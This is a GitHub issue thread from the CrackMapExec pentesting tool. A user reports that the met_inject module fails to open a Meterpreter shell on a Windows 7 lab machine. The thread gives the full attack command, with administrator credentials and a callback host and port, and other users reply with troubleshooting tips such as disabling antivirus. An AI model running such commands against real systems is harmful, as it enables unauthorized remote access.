CrackMapExec icon indicating copy to clipboard operation
CrackMapExec copied to clipboard

Met_inject Module Fails to inject Meterpreter shell

Open JK-Love opened this issue 3 years ago • 3 comments

Steps to reproduce

  1. ...
  2. ...

Command string used

crackmapexec smb 192.168.203.131 -u administrator -p "123" -M met_inject -o SRVHOST=192.168.203.129 SRVPORT=8777 RAND=tQVZLO5RhaPEii7 SSL=http

CME verbose output (using the --verbose flag)

CME Version (cme --version)

Version: 5.1.6dev

OS

Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2021.2 Codename: kali-rolling

Target OS

WIN7 PRO SP1 6.1.7601 Service Pack 1 Build 7601

Detailed issue explanation

image image

image

image

no shell I guarantee that I follow https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Modules The steps are done step by step, and I have repeatedly confirmed that there is no problem with the parameters. I looked through all the "Issues" and didn't see any similar questions, so I came to ask questions

I guess the problem is that the same thing as the picture below is missing in the steps I performed The picture below is someone else’s image

JK-Love avatar Jun 27 '21 08:06 JK-Love

Hello

Check with AV disabled :)

mpgn avatar Jun 27 '21 08:06 mpgn

There is no antivirus software in the test environment

JK-Love avatar Jul 02 '21 05:07 JK-Love

make sure your VM IP must be accessible from your target machine, else you would not get any response from the target machine, and as result you wouldn’t get any shell from the machine

abid28june avatar Jun 24 '22 19:06 abid28june